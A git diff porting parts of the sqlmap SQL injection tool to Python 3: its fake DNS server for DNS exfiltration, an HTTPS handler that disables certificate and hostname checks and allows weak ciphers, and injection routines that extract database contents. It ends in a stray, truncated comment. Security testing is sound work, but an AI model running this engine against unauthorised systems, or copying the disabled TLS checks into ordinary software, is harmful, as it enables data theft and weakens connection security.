+ i = i + j + 1 + j = ord(raw[i:i + 1]) + except TypeError: + pass def response(self, resolution): """ Crafts raw DNS resolution response packet """ - retVal = "" + retVal = b"" if self._query: - retVal += self._raw[:2] # Transaction ID - retVal += "\x85\x80" # Flags (Standard query response, No error) - retVal += self._raw[4:6] + self._raw[4:6] + "\x00\x00\x00\x00" # Questions and Answers Counts - retVal += self._raw[12:(12 + self._raw[12:].find("\x00") + 5)] # Original Domain Name Query - retVal += "\xc0\x0c" # Pointer to domain name - retVal += "\x00\x01" # Type A - retVal += "\x00\x01" # Class IN - retVal += "\x00\x00\x00\x20" # TTL (32 seconds) - retVal += "\x00\x04" # Data length - retVal += "".join(chr(int(_)) for _ in resolution.split('.')) # 4 bytes of IP + retVal += self._raw[:2] # Transaction ID + retVal += b"\x85\x80" # Flags (Standard query response, No error) + retVal += self._raw[4:6] + self._raw[4:6] + b"\x00\x00\x00\x00" # Questions and Answers Counts + retVal += self._raw[12:(12 + self._raw[12:].find(b"\x00") + 5)] # Original Domain Name Query + retVal += b"\xc0\x0c" # Pointer to domain name + retVal += b"\x00\x01" # Type A + retVal += b"\x00\x01" # Class IN + retVal += b"\x00\x00\x00\x20" # TTL (32 seconds) + retVal += b"\x00\x04" # Data length + retVal += b"".join(struct.pack('B', int(_)) for _ in resolution.split('.')) # 4 bytes of IP return retVal class DNSServer(object): + """ + Used for making fake DNS resolution responses based on received + raw request + + Reference(s): + https://code.activestate.com/recipes/491264-mini-fake-dns-server/ + https://web.archive.org/web/20150418152405/https://code.google.com/p/marlon-tools/source/browse/tools/dnsproxy/dnsproxy.py + """ + def __init__(self): + self._check_localhost() self._requests = [] self._lock = threading.Lock() - self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + + try: + self._socket = socket._orig_socket(socket.AF_INET, socket.SOCK_DGRAM) + except AttributeError: + self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) self._socket.bind(("", 53)) self._running = False + self._initialized = False + + def _check_localhost(self): + response = b"" + s = None + + try: + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.settimeout(1.0) + s.connect(("", 53)) + s.send(binascii.unhexlify("6509012000010000000000010377777706676f6f676c6503636f6d00000100010000291000000000000000")) # A www.google.com + response = s.recv(512) + except: + pass + finally: + if s: + s.close() + + if response and b"google" in response: + raise socket.error("another DNS service already running on '0.0.0.0:53'") def pop(self, prefix=None, suffix=None): """ @@ -74,11 +114,17 @@ def pop(self, prefix=None, suffix=None): retVal = None + if prefix and hasattr(prefix, "encode"): + prefix = prefix.encode() + + if suffix and hasattr(suffix, "encode"): + suffix = suffix.encode() + with self._lock: for _ in self._requests: - if prefix is None and suffix is None or re.search("%s\..+\.%s" % (prefix, suffix), _, re.I): - retVal = _ + if prefix is None and suffix is None or re.search(b"%s\\..+\\.%s" % (prefix, suffix), _, re.I): self._requests.remove(_) + retVal = _.decode() break return retVal @@ -91,6 +137,7 @@ def run(self): def _(): try: self._running = True + self._initialized = True while True: data, addr = self._socket.recvfrom(1024) @@ -116,6 +163,9 @@ def _(): server = DNSServer() server.run() + while not server._initialized: + time.sleep(0.1) + while 
server._running: while True: _ = server.pop() @@ -123,13 +173,13 @@ def _(): if _ is None: break else: - print "[i] %s" % _ + print("[i] %s" % _) time.sleep(1) - except socket.error, ex: + except socket.error as ex: if 'Permission' in str(ex): - print "[x] Please run with sudo/Administrator privileges" + print("[x] Please run with sudo/Administrator privileges") else: raise except KeyboardInterrupt: diff --git a/lib/request/httpshandler.py b/lib/request/httpshandler.py index 35a06f0bb8f..94f50fb1a16 100644 --- a/lib/request/httpshandler.py +++ b/lib/request/httpshandler.py @@ -1,16 +1,24 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import httplib +import re import socket -import urllib2 +from lib.core.common import filterNone +from lib.core.common import getSafeExString +from lib.core.compat import LooseVersion +from lib.core.compat import xrange +from lib.core.data import conf +from lib.core.data import kb from lib.core.data import logger from lib.core.exception import SqlmapConnectionException +from lib.core.settings import PYVERSION +from thirdparty.six.moves import http_client as _http_client +from thirdparty.six.moves import urllib as _urllib ssl = None try: @@ -19,17 +27,29 @@ except ImportError: pass -_protocols = [ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1] +_protocols = filterNone(getattr(ssl, _, None) for _ in ("PROTOCOL_TLS_CLIENT", "PROTOCOL_TLSv1_2", "PROTOCOL_TLSv1_1", "PROTOCOL_TLSv1", "PROTOCOL_SSLv3", "PROTOCOL_SSLv23", "PROTOCOL_SSLv2")) +_lut = dict((getattr(ssl, _), _) for _ in dir(ssl) if _.startswith("PROTOCOL_")) +_contexts = {} -class HTTPSConnection(httplib.HTTPSConnection): +class HTTPSConnection(_http_client.HTTPSConnection): """ Connection class that enables usage of newer SSL protocols. Reference: http://bugs.python.org/msg128686 + + NOTE: use https://check-tls.akamaized.net/ to check if (e.g.) 
TLS/SNI is working properly """ def __init__(self, *args, **kwargs): - httplib.HTTPSConnection.__init__(self, *args, **kwargs) + # NOTE: Dirty patch for https://bugs.python.org/issue38251 / https://github.com/sqlmapproject/sqlmap/issues/4158 + if hasattr(ssl, "_create_default_https_context"): + if None not in _contexts: + _contexts[None] = ssl._create_default_https_context() + kwargs["context"] = _contexts[None] + + self.retrying = False + + _http_client.HTTPSConnection.__init__(self, *args, **kwargs) def connect(self): def create_sock(): @@ -41,24 +61,82 @@ def create_sock(): success = False - for protocol in _protocols: - try: - sock = create_sock() - _ = ssl.wrap_socket(sock, self.key_file, self.cert_file, ssl_version=protocol) - if _: - success = True - self.sock = _ - _protocols.remove(protocol) - _protocols.insert(0, protocol) - break - else: - sock.close() - except ssl.SSLError, errMsg: - logger.debug("SSL connection error occured ('%s')" % errMsg) + # Reference(s): https://docs.python.org/2/library/ssl.html#ssl.SSLContext + # https://www.mnot.net/blog/2014/12/27/python_2_and_tls_sni + if hasattr(ssl, "SSLContext"): + for protocol in (_ for _ in _protocols if _ >= ssl.PROTOCOL_TLSv1): + sock = None + try: + sock = create_sock() + if protocol not in _contexts: + _contexts[protocol] = ssl.SSLContext(protocol) + + # Disable certificate and hostname validation enabled by default with PROTOCOL_TLS_CLIENT + _contexts[protocol].check_hostname = False + _contexts[protocol].verify_mode = ssl.CERT_NONE + + if getattr(self, "cert_file", None) and getattr(self, "key_file", None): + _contexts[protocol].load_cert_chain(certfile=self.cert_file, keyfile=self.key_file) + try: + # Reference(s): https://askubuntu.com/a/1263098 + # https://askubuntu.com/a/1250807 + # https://git.zknt.org/mirror/bazarr/commit/7f05f932ffb84ba8b9e5630b2adc34dbd77e2b4a?style=split&whitespace=show-all&show-outdated= + _contexts[protocol].set_ciphers("ALL@SECLEVEL=0") + except (ssl.SSLError, AttributeError): + pass + result = _contexts[protocol].wrap_socket(sock, do_handshake_on_connect=True, server_hostname=self.host if re.search(r"\A[\d.]+\Z", self.host or "") is None else None) + if result: + success = True + self.sock = result + _protocols.remove(protocol) + _protocols.insert(0, protocol) + break + else: + sock.close() + except (ssl.SSLError, socket.error, _http_client.BadStatusLine, AttributeError) as ex: + self._tunnel_host = None + if sock: + sock.close() + logger.debug("SSL connection error occurred for '%s' ('%s')" % (_lut[protocol], getSafeExString(ex))) + + elif hasattr(ssl, "wrap_socket"): + for protocol in _protocols: + try: + sock = create_sock() + _ = ssl.wrap_socket(sock, keyfile=getattr(self, "key_file"), certfile=getattr(self, "cert_file"), ssl_version=protocol) + if _: + success = True + self.sock = _ + _protocols.remove(protocol) + _protocols.insert(0, protocol) + break + else: + sock.close() + except (ssl.SSLError, socket.error, _http_client.BadStatusLine) as ex: + self._tunnel_host = None + logger.debug("SSL connection error occurred for '%s' ('%s')" % (_lut[protocol], getSafeExString(ex))) if not success: - raise SqlmapConnectionException("can't establish SSL connection") + errMsg = "can't establish SSL connection" + # Reference: https://docs.python.org/2/library/ssl.html + if LooseVersion(PYVERSION) < LooseVersion("2.7.9"): + errMsg += " (please retry with Python >= 2.7.9)" + + if kb.sslSuccess and not self.retrying: + self.retrying = True + + for _ in xrange(conf.retries): + try: + self.connect() + 
except SqlmapConnectionException: + pass + else: + return + + raise SqlmapConnectionException(errMsg) + else: + kb.sslSuccess = True -class HTTPSHandler(urllib2.HTTPSHandler): +class HTTPSHandler(_urllib.request.HTTPSHandler): def https_open(self, req): - return self.do_open(HTTPSConnection if ssl else httplib.HTTPSConnection, req) + return self.do_open(HTTPSConnection if ssl else _http_client.HTTPSConnection, req) diff --git a/lib/request/inject.py b/lib/request/inject.py index 962e633dabc..2bb641acad8 100644 --- a/lib/request/inject.py +++ b/lib/request/inject.py @@ -1,45 +1,62 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from __future__ import print_function + import re import time from lib.core.agent import agent from lib.core.bigarray import BigArray +from lib.core.common import applyFunctionRecursively from lib.core.common import Backend from lib.core.common import calculateDeltaSeconds from lib.core.common import cleanQuery from lib.core.common import expandAsteriskForColumns from lib.core.common import extractExpectedValue +from lib.core.common import filterNone from lib.core.common import getPublicTypeMembers +from lib.core.common import getTechnique +from lib.core.common import getTechniqueData from lib.core.common import hashDBRetrieve from lib.core.common import hashDBWrite from lib.core.common import initTechnique +from lib.core.common import isDigit from lib.core.common import isNoneValue from lib.core.common import isNumPosStrValue from lib.core.common import isTechniqueAvailable from lib.core.common import parseUnionPage from lib.core.common import popValue from lib.core.common import pushValue +from lib.core.common import randomStr from lib.core.common import readInput +from lib.core.common import setTechnique from lib.core.common import singleTimeWarnMessage +from lib.core.compat import xrange from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.data import queries +from lib.core.decorators import lockedmethod +from lib.core.decorators import stackedmethod from lib.core.dicts import FROM_DUMMY_TABLE from lib.core.enums import CHARSET_TYPE from lib.core.enums import DBMS from lib.core.enums import EXPECTED from lib.core.enums import PAYLOAD +from lib.core.exception import SqlmapConnectionException +from lib.core.exception import SqlmapDataException from lib.core.exception import SqlmapNotVulnerableException from lib.core.exception import SqlmapUserQuitException +from lib.core.settings import GET_VALUE_UPPERCASE_KEYWORDS +from lib.core.settings import INFERENCE_MARKER from lib.core.settings import MAX_TECHNIQUES_PER_VALUE from lib.core.settings import SQL_SCALAR_REGEX +from lib.core.settings import UNICODE_ENCODING from lib.core.threads import getCurrentThreadData from lib.request.connect import Connect as Request from lib.request.direct import direct @@ -49,11 +66,12 @@ from lib.techniques.dns.use import dnsUse from lib.techniques.error.use import errorUse from lib.techniques.union.use import unionUse +from thirdparty import six def _goDns(payload, expression): value = None - if conf.dnsName and kb.dnsTest is not False: + if conf.dnsDomain and kb.dnsTest is not False and not kb.testMode and Backend.getDbms() is not None: if kb.dnsTest is None: dnsTest(payload) @@ -69,14 +87,33 @@ def _goInference(payload, 
expression, charsetType=None, firstChar=None, lastChar value = _goDns(payload, expression) - if value: + if payload is None: + return None + + if value is not None: return value - timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) + timeBasedCompare = (getTechnique() in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) + + if timeBasedCompare and conf.threads > 1 and kb.forceThreads is None: + msg = "multi-threading is considered unsafe in " + msg += "time-based data retrieval. Are you sure " + msg += "of your choice (breaking warranty) [y/N] " + + kb.forceThreads = readInput(msg, default='N', boolean=True) if not (timeBasedCompare and kb.dnsTest): - if (conf.eta or conf.threads > 1) and Backend.getIdentifiedDbms() and not re.search("(COUNT|LTRIM)\(", expression, re.I) and not timeBasedCompare: - if field and conf.hexConvert: + if (conf.eta or conf.threads > 1) and Backend.getIdentifiedDbms() and not re.search(r"(COUNT|LTRIM)\(", expression, re.I) and not (timeBasedCompare and not kb.forceThreads): + + if field and re.search(r"\ASELECT\s+DISTINCT\((.+?)\)\s+FROM", expression, re.I): + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.MONETDB, DBMS.VERTICA, DBMS.CRATEDB, DBMS.CUBRID): + alias = randomStr(lowercase=True, seed=hash(expression)) + expression = "SELECT %s FROM (%s)" % (field if '.' not in field else re.sub(r".+\.", "%s." % alias, field), expression) # Note: MonetDB as a prime example + expression += " AS %s" % alias + else: + expression = "SELECT %s FROM (%s)" % (field, expression) + + if field and conf.hexConvert or conf.binaryFields and field in conf.binaryFields or Backend.getIdentifiedDbms() in (DBMS.RAIMA,): nulledCastedField = agent.nullAndCastField(field) injExpression = expression.replace(field, nulledCastedField, 1) else: @@ -90,7 +127,7 @@ def _goInference(payload, expression, charsetType=None, firstChar=None, lastChar kb.inferenceMode = False if not kb.bruteMode: - debugMsg = "performed %d queries in %d seconds" % (count, calculateDeltaSeconds(start)) + debugMsg = "performed %d quer%s in %.2f seconds" % (count, 'y' if count == 1 else "ies", calculateDeltaSeconds(start)) logger.debug(debugMsg) return value @@ -107,7 +144,7 @@ def _goInferenceFields(expression, expressionFields, expressionFieldsList, paylo if isinstance(num, int): origExpr = expression - expression = agent.limitQuery(num, expression, field) + expression = agent.limitQuery(num, expression, field, expressionFieldsList[0]) if "ROWNUM" in expressionFieldsList: expressionReplaced = expression @@ -130,9 +167,9 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char parameter through a bisection algorithm. 
""" - initTechnique(kb.technique) + initTechnique(getTechnique()) - query = agent.prefixQuery(kb.injection.data[kb.technique].vector) + query = agent.prefixQuery(getTechniqueData().vector) query = agent.suffixQuery(query) payload = agent.payload(newValue=query) count = None @@ -145,7 +182,7 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(expression) - rdbRegExp = re.search("RDB\$GET_CONTEXT\([^)]+\)", expression, re.I) + rdbRegExp = re.search(r"RDB\$GET_CONTEXT\([^)]+\)", expression, re.I) if rdbRegExp and Backend.isDbms(DBMS.FIREBIRD): expressionFieldsList = [expressionFields] @@ -161,16 +198,13 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char # forge the SQL limiting the query output one entry at a time # NOTE: we assume that only queries that get data from a table # can return multiple entries - if fromUser and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() \ - not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not \ - expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \ - and not re.search(SQL_SCALAR_REGEX, expression, re.I): + if fromUser and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and not re.search(SQL_SCALAR_REGEX, expression, re.I) and hasattr(queries[Backend.getIdentifiedDbms()].limitregexp, "query"): expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression) if limitCond: test = True - if not stopLimit or stopLimit <= 1: + if stopLimit is None or stopLimit <= 1: if Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]): test = False @@ -179,7 +213,7 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char countFirstField = queries[Backend.getIdentifiedDbms()].count.query % expressionFieldsList[0] countedExpression = expression.replace(expressionFields, countFirstField, 1) - if " ORDER BY " in expression.upper(): + if " ORDER BY " in countedExpression.upper(): _ = countedExpression.upper().rindex(" ORDER BY ") countedExpression = countedExpression[:_] @@ -189,7 +223,7 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char if isNumPosStrValue(count): count = int(count) - if batch: + if batch or count == 1: stopLimit = count else: message = "the SQL query provided can return " @@ -197,26 +231,26 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char message += "entries do you want to retrieve?\n" message += "[a] All (default)\n[#] Specific number\n" message += "[q] Quit" - test = readInput(message, default="a") + choice = readInput(message, default='A').upper() - if not test or test[0] in ("a", "A"): + if choice == 'A': stopLimit = count - elif test[0] in ("q", "Q"): + elif choice == 'Q': raise SqlmapUserQuitException - elif test.isdigit() and int(test) > 0 and int(test) <= count: - stopLimit = int(test) + elif isDigit(choice) and int(choice) > 0 and int(choice) <= count: + stopLimit = int(choice) infoMsg = "sqlmap is now going to retrieve the " infoMsg += "first %d query output entries" % stopLimit logger.info(infoMsg) - elif test[0] in ("#", "s", "S"): + elif choice in ('#', 'S'): message = "how 
many? " stopLimit = readInput(message, default="10") - if not stopLimit.isdigit(): + if not isDigit(stopLimit): errMsg = "invalid choice" logger.error(errMsg) @@ -231,20 +265,20 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char return None - elif count and not count.isdigit(): + elif count and not isDigit(count): warnMsg = "it was not possible to count the number " warnMsg += "of entries for the SQL query provided. " warnMsg += "sqlmap will assume that it returns only " warnMsg += "one entry" - logger.warn(warnMsg) + logger.warning(warnMsg) stopLimit = 1 - elif (not count or int(count) == 0): + elif not isNumPosStrValue(count): if not count: warnMsg = "the SQL query provided does not " warnMsg += "return any output" - logger.warn(warnMsg) + logger.warning(warnMsg) return None @@ -252,14 +286,19 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char return None try: - for num in xrange(startLimit, stopLimit): - output = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, num=num, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump) - outputs.append(output) + try: + for num in xrange(startLimit or 0, stopLimit or 0): + output = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, num=num, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump) + outputs.append(output) + except OverflowError: + errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit) + errMsg += "with switch '--fresh-queries'" + raise SqlmapDataException(errMsg) except KeyboardInterrupt: - print + print() warnMsg = "user aborted during dumping phase" - logger.warn(warnMsg) + logger.warning(warnMsg) return outputs @@ -268,21 +307,31 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char outputs = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump) - return ", ".join(output for output in outputs) if not isNoneValue(outputs) else None + return ", ".join(output or "" for output in outputs) if not isNoneValue(outputs) else None def _goBooleanProxy(expression): """ Retrieve the output of a boolean based SQL query """ - initTechnique(kb.technique) + initTechnique(getTechnique()) - vector = kb.injection.data[kb.technique].vector - vector = vector.replace("[INFERENCE]", expression) + if conf.dnsDomain: + query = agent.prefixQuery(getTechniqueData().vector) + query = agent.suffixQuery(query) + payload = agent.payload(newValue=query) + output = _goDns(payload, expression) + + if output is not None: + return output + + vector = getTechniqueData().vector + vector = vector.replace(INFERENCE_MARKER, expression) query = agent.prefixQuery(vector) query = agent.suffixQuery(query) payload = agent.payload(newValue=query) - timeBasedCompare = kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) + + timeBasedCompare = getTechnique() in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) output = hashDBRetrieve(expression, checkConf=True) @@ -302,32 +351,45 @@ def _goUnion(expression, unpack=True, dump=False): output = unionUse(expression, unpack=unpack, dump=dump) - if isinstance(output, basestring): + if isinstance(output, six.string_types): output = parseUnionPage(output) return output +@lockedmethod +@stackedmethod def getValue(expression, blind=True, union=True, error=True, time=True, fromUser=False, 
expected=None, batch=False, unpack=True, resumeValue=True, charsetType=None, firstChar=None, lastChar=None, dump=False, suppressOutput=None, expectingNone=False, safeCharEncode=True): """ Called each time sqlmap inject a SQL query on the SQL injection affected parameter. """ - if conf.hexConvert: - charsetType = CHARSET_TYPE.HEXADECIMAL + if conf.hexConvert and expected != EXPECTED.BOOL and Backend.getIdentifiedDbms(): + if not hasattr(queries[Backend.getIdentifiedDbms()], "hex"): + warnMsg = "switch '--hex' is currently not supported on DBMS %s" % Backend.getIdentifiedDbms() + singleTimeWarnMessage(warnMsg) + conf.hexConvert = False + else: + charsetType = CHARSET_TYPE.HEXADECIMAL kb.safeCharEncode = safeCharEncode kb.resumeValues = resumeValue + for keyword in GET_VALUE_UPPERCASE_KEYWORDS: + expression = re.sub(r"(?i)(\A|\(|\)|\s)%s(\Z|\(|\)|\s)" % keyword, r"\g<1>%s\g<2>" % keyword, expression) + if suppressOutput is not None: pushValue(getCurrentThreadData().disableStdOut) getCurrentThreadData().disableStdOut = suppressOutput try: + pushValue(conf.db) + pushValue(conf.tbl) + if expected == EXPECTED.BOOL: forgeCaseExpression = booleanExpression = expression - if expression.upper().startswith("SELECT "): + if expression.startswith("SELECT "): booleanExpression = "(%s)=%s" % (booleanExpression, "'1'" if "'1'" in booleanExpression else "1") else: forgeCaseExpression = agent.forgeCaseStatement(expression) @@ -335,7 +397,7 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser if conf.direct: value = direct(forgeCaseExpression if expected == EXPECTED.BOOL else expression) - elif any(map(isTechniqueAvailable, getPublicTypeMembers(PAYLOAD.TECHNIQUE, onlyValues=True))): + elif any(isTechniqueAvailable(_) for _ in getPublicTypeMembers(PAYLOAD.TECHNIQUE, onlyValues=True)): query = cleanQuery(expression) query = expandAsteriskForColumns(query) value = None @@ -347,26 +409,58 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser if not conf.forceDns: if union and isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION): - kb.technique = PAYLOAD.TECHNIQUE.UNION - value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump) + setTechnique(PAYLOAD.TECHNIQUE.UNION) + kb.forcePartialUnion = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector[8] + fallback = not expected and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL and not kb.forcePartialUnion + + if expected == EXPECTED.BOOL: + # Note: some DBMSes (e.g. Altibase) don't support implicit conversion of boolean check result during concatenation with prefix and suffix (e.g. 'qjjvq'||(1=1)||'qbbbq') + + if not any(_ in forgeCaseExpression for _ in ("SELECT", "CASE")): + forgeCaseExpression = "(CASE WHEN (%s) THEN '1' ELSE '0' END)" % forgeCaseExpression + + try: + value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump) + except SqlmapConnectionException: + if not fallback: + raise + count += 1 found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE + if not found and fallback: + warnMsg = "something went wrong with full UNION " + warnMsg += "technique (could be because of " + warnMsg += "limitation on retrieved number of entries)" + if " FROM " in query.upper(): + warnMsg += ". 
Falling back to partial UNION technique" + singleTimeWarnMessage(warnMsg) + + try: + pushValue(kb.forcePartialUnion) + kb.forcePartialUnion = True + value = _goUnion(query, unpack, dump) + found = (value is not None) or (value is None and expectingNone) + finally: + kb.forcePartialUnion = popValue() + else: + singleTimeWarnMessage(warnMsg) + if error and any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) and not found: - kb.technique = PAYLOAD.TECHNIQUE.ERROR if isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) else PAYLOAD.TECHNIQUE.QUERY + setTechnique(PAYLOAD.TECHNIQUE.ERROR if isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) else PAYLOAD.TECHNIQUE.QUERY) value = errorUse(forgeCaseExpression if expected == EXPECTED.BOOL else query, dump) count += 1 found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE - if found and conf.dnsName: - _ = "".join(filter(None, (key if isTechniqueAvailable(value) else None for key, value in {"E": PAYLOAD.TECHNIQUE.ERROR, "Q": PAYLOAD.TECHNIQUE.QUERY, "U": PAYLOAD.TECHNIQUE.UNION}.items()))) + if found and conf.dnsDomain: + _ = "".join(filterNone(key if isTechniqueAvailable(value) else None for key, value in {'E': PAYLOAD.TECHNIQUE.ERROR, 'Q': PAYLOAD.TECHNIQUE.QUERY, 'U': PAYLOAD.TECHNIQUE.UNION}.items())) warnMsg = "option '--dns-domain' will be ignored " warnMsg += "as faster techniques are usable " warnMsg += "(%s) " % _ singleTimeWarnMessage(warnMsg) if blind and isTechniqueAvailable(PAYLOAD.TECHNIQUE.BOOLEAN) and not found: - kb.technique = PAYLOAD.TECHNIQUE.BOOLEAN + setTechnique(PAYLOAD.TECHNIQUE.BOOLEAN) if expected == EXPECTED.BOOL: value = _goBooleanProxy(booleanExpression) @@ -377,16 +471,18 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE if time and (isTechniqueAvailable(PAYLOAD.TECHNIQUE.TIME) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED)) and not found: + match = re.search(r"\bFROM\b ([^ ]+).+ORDER BY ([^ ]+)", expression) + kb.responseTimeMode = "%s|%s" % (match.group(1), match.group(2)) if match else None + if isTechniqueAvailable(PAYLOAD.TECHNIQUE.TIME): - kb.technique = PAYLOAD.TECHNIQUE.TIME + setTechnique(PAYLOAD.TECHNIQUE.TIME) else: - kb.technique = PAYLOAD.TECHNIQUE.STACKED + setTechnique(PAYLOAD.TECHNIQUE.STACKED) if expected == EXPECTED.BOOL: value = _goBooleanProxy(booleanExpression) else: value = _goInferenceProxy(query, fromUser, batch, unpack, charsetType, firstChar, lastChar, dump) - else: errMsg = "none of the injection types identified can be " errMsg += "leveraged to retrieve queries output" @@ -394,21 +490,68 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser finally: kb.resumeValues = True + kb.responseTimeMode = None + + conf.tbl = popValue() + conf.db = popValue() if suppressOutput is not None: getCurrentThreadData().disableStdOut = popValue() kb.safeCharEncode = False - if not kb.testMode and value is None and Backend.getDbms() and conf.dbmsHandler: - warnMsg = "in case of continuous data retrieval problems you are advised to try " - warnMsg += "a switch '--no-cast' and/or switch '--hex'" - singleTimeWarnMessage(warnMsg) + if not any((kb.testMode, conf.dummy, conf.offline, conf.noCast, conf.hexConvert)) and value is None and Backend.getDbms() and conf.dbmsHandler and kb.fingerprinted: + if conf.abortOnEmpty: + errMsg = "aborting due to empty data retrieval" + 
logger.critical(errMsg) + raise SystemExit + else: + warnMsg = "in case of continuous data retrieval problems you are advised to try " + warnMsg += "a switch '--no-cast' " + warnMsg += "or switch '--hex'" if hasattr(queries[Backend.getIdentifiedDbms()], "hex") else "" + singleTimeWarnMessage(warnMsg) + + # Dirty patch (MSSQL --binary-fields with 0x31003200...) + if Backend.isDbms(DBMS.MSSQL) and conf.binaryFields: + def _(value): + if isinstance(value, six.text_type): + if value.startswith(u"0x"): + value = value[2:] + if value and len(value) % 4 == 0: + candidate = "" + for i in xrange(len(value)): + if i % 4 < 2: + candidate += value[i] + elif value[i] != '0': + candidate = None + break + if candidate: + value = candidate + return value + + value = applyFunctionRecursively(value, _) + + # Dirty patch (safe-encoded unicode characters) + if isinstance(value, six.text_type) and "\\x" in value: + try: + candidate = eval(repr(value).replace("\\\\x", "\\x").replace("u'", "'", 1)).decode(conf.encoding or UNICODE_ENCODING) + if "\\x" not in candidate: + value = candidate + except: + pass return extractExpectedValue(value, expected) def goStacked(expression, silent=False): - kb.technique = PAYLOAD.TECHNIQUE.STACKED + if PAYLOAD.TECHNIQUE.STACKED in kb.injection.data: + setTechnique(PAYLOAD.TECHNIQUE.STACKED) + else: + for technique in getPublicTypeMembers(PAYLOAD.TECHNIQUE, True): + _ = getTechniqueData(technique) + if _ and "stacked" in _["title"].lower(): + setTechnique(technique) + break + expression = cleanQuery(expression) if conf.direct: @@ -417,7 +560,7 @@ def goStacked(expression, silent=False): query = agent.prefixQuery(";%s" % expression) query = agent.suffixQuery(query) payload = agent.payload(newValue=query) - Request.queryPage(payload, content=False, silent=silent, noteResponseTime=False, timeBasedCompare=True) + Request.queryPage(payload, content=False, silent=silent, noteResponseTime=False, timeBasedCompare="SELECT" in (payload or "").upper()) def checkBooleanExpression(expression, expectingNone=True): return getValue(expression, expected=EXPECTED.BOOL, charsetType=CHARSET_TYPE.BINARY, suppressOutput=True, expectingNone=expectingNone) diff --git a/lib/request/methodrequest.py b/lib/request/methodrequest.py index 14c41ed9b71..3250cfe5c60 100644 --- a/lib/request/methodrequest.py +++ b/lib/request/methodrequest.py @@ -1,20 +1,20 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import urllib2 +from lib.core.convert import getText +from thirdparty.six.moves import urllib as _urllib - -class MethodRequest(urllib2.Request): - ''' - Used to create HEAD/PUT/DELETE/... requests with urllib2 - ''' +class MethodRequest(_urllib.request.Request): + """ + Used to create HEAD/PUT/DELETE/... requests with urllib + """ def set_method(self, method): - self.method = method.upper() + self.method = getText(method.upper()) # Dirty hack for Python3 (may it rot in hell!) 
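# --- Illustrative sketch, not part of the patch: MethodRequest simply forces
# --- urllib to emit an arbitrary HTTP verb by overriding get_method(). A minimal
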